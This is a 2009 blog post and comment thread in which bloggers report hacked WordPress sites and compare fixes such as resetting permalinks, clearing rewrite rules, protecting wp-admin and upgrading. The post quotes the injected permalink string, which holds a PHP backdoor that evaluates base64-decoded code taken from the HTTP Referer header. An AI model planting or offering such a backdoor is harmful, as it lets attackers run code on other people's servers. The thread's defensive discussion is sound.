Urgent Security Warning for WordPress
September 5, 2009 Posted by KP
I just found that my two wordpress blogs were hacked, the permanent link structure was changed to:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
This caused the individual posts couldn’t be accessed.
I don’t know how this was hacked, and what other damages were caused. For now, a urgent solution would be protecting wp-admin directory.
I have seen some other hacked blogs, I strongly suggest you take actions immediately. The above might not be a good solution, but should be helpful.
Related Posts:
- 301 Redirect
- Google App configuration for bind
- Another Hack on Third-party Script
- RSS Feed
- Apache and Google
- Security Discussion
- Great FreeBSD Security Page
Filed Under: Security
September 5th, 2009 at 1:33 am
One of my WP blogs was hacked as well, and I am wondering about the _transient_rewrite_rules row in the wp_options table. This post says to empty it: http://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/
I did that with no immediately apparent negative effects on the blog, but I don’t really know what all the gibberish was doing. I checked a couple other blogs and the string is different in different blogs.
It looks like legitimate code to me, but I can’t tell.
September 5th, 2009 at 1:39 am
Luke: I only changed the permanent link structure back with admin control panel, I didn’t modify the database directly, now the hacked blogs seem to work fine.
September 5th, 2009 at 1:52 am
Is this related to the <=2.8.3 admin password reset bug? Is there something I need to do to protect my WP installs?
September 5th, 2009 at 1:59 am
It doesn’t seem to be the same problem, probably this is a new exploit which hasn’t been addressed. I protected wp-admin directory for all my WP blogs.
September 5th, 2009 at 2:14 am
Cool - will look into your post on that.
September 5th, 2009 at 1:08 pm
More good info coming out on this hack: http://blog.nachotech.com/?p=125
I also tried renaming xmlrpc.php and wp-register.php, which are in the WP root. Lots of chaos out there…seems to be all older versions than 2.8.4 so far. That means I am not 100% safe yet…
September 5th, 2009 at 2:31 pm
Thanks for the link, Luke, it has lots of good info. I only protected the admin directory, which seems not enough at all.
Upgrading to the latest version is always a good habit.
Protecting the admin directory is very important, it can prevent most exploits, even after the site was hacked and back door was left but without accessing those files under wp-admin, not much things can be done.
September 9th, 2009 at 4:52 am
Had a site that was hacked with the wp-cache plugin installed, and fixing it took a lot longer. Had to clear some data out of the permalinks option AND out of the rewrite_rules field, and had to disable all plugins to get anything to display at all!
WP-Cache seems to have been to blame, but it was strange that nothing would display (blank white page) for both the site and the /wp-admin/ directory.
October 9th, 2009 at 12:59 pm
Sorry, missed your comment. When you get blank pages, check Apache error log file, usually it will tell you what’s wrong.